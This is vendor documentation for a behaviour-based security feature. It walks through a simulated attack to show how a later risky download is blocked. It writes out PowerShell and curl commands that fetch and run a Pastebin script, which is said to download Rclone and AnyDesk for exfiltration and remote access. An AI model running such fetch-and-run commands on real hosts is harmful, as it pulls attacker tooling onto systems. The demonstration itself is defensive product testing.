Overview
Dynamic Prevention is a behavior-based security engine that proactively applies dynamic controls in response to detected threats to reduce the attack surface and mitigate threats early, before any impact occurs. For more information, see What is Dynamic Prevention?
This article simulates a real-world attack scenario to demonstrate how Dynamic Prevention protects your network. In this example, a user downloads a script from Pastebin that an attacker uses to attempt to retrieve additional high-risk tools required to carry out a future attack. Dynamic Prevention identifies the malicious behavior and blocks the tool from being downloaded, preventing the attack before it can progress or any impact occurs.
The response to this attack is fully automated. No additional rules are required. Simply enabling Dynamic Prevention is sufficient to prevent the attack.
To simulate this attack:
Download a high-risk tool without being blocked
Download the script from Pastebin
Attempt to download the high-risk tools again. This time, the download is blocked.
Prerequisites
Dynamic Prevention is enabled with actions set to Block
Step 1: Download a High-Risk Tool
To demonstrate that Dynamic Prevention blocks actions only when they are part of a malicious sequence, first download Rclone an open-source command-line tool for managing files. Attackers commonly use Rclone as a post-compromise tool because it is legitimate, powerful, and blends in with normal administrative activity.
Action
Download Rclone from either:
The following URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zipOn Windows devices:
The following PowerShell command:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
On macOS/Linux devices:
The following Terminal command:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
Result
The file downloads successfully.
Explanation
This confirms that, in isolation, the action is not blocked, as it is not considered malicious when it is not preceded by suspicious activity.
Step 2: Download a Script from Pastebin
To simulate the start of an attack, download a script from Pastebin that, when run, downloads common attacker tools, for example, Rclone and AnyDesk for remote access and exfiltration.
Action
Download and run the script from Pastebin:
On Windows devices:
The following PowerShell command:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
On macOS/Linux devices:
The following Terminal command:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
Result
The script runs and downloads the tools. A dynamic control is applied to the host, which is shown in the Threats Dashboard in the Host with Controls widget. For more information, see Using the Security Threats Dashboard.

Explanation
Dynamic Prevention detects indicators of suspicious behavior and proactively enforces controls to block subsequent malicious actions, stopping the attack before any impact occurs.
Step 3: Download a High-Risk Tool
In the simulated attack, the attacker attempts to download Rclone. However, because this action follows the suspicious activity of downloading the script from Pastebin and a control is applied, Dynamic Prevention blocks the Rclone download.
Action
Download Rclone from either:
The following URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zipOn Windows devices:
The following PowerShell command:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
On macOS/Linux devices:
The following Terminal command:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
Result
The download of this file is blocked by the control. The mitigated threat is shown in the Threats Dashboard in the Host with Mitigated Threats widget.

Explanation
Unlike in Step 1, where this script was run in isolation and therefore allowed, the download of this script was now preceded by a suspicious action and is blocked by Dynamic Prevention.
Demonstration
This video shows a demonstration of this simulated attack: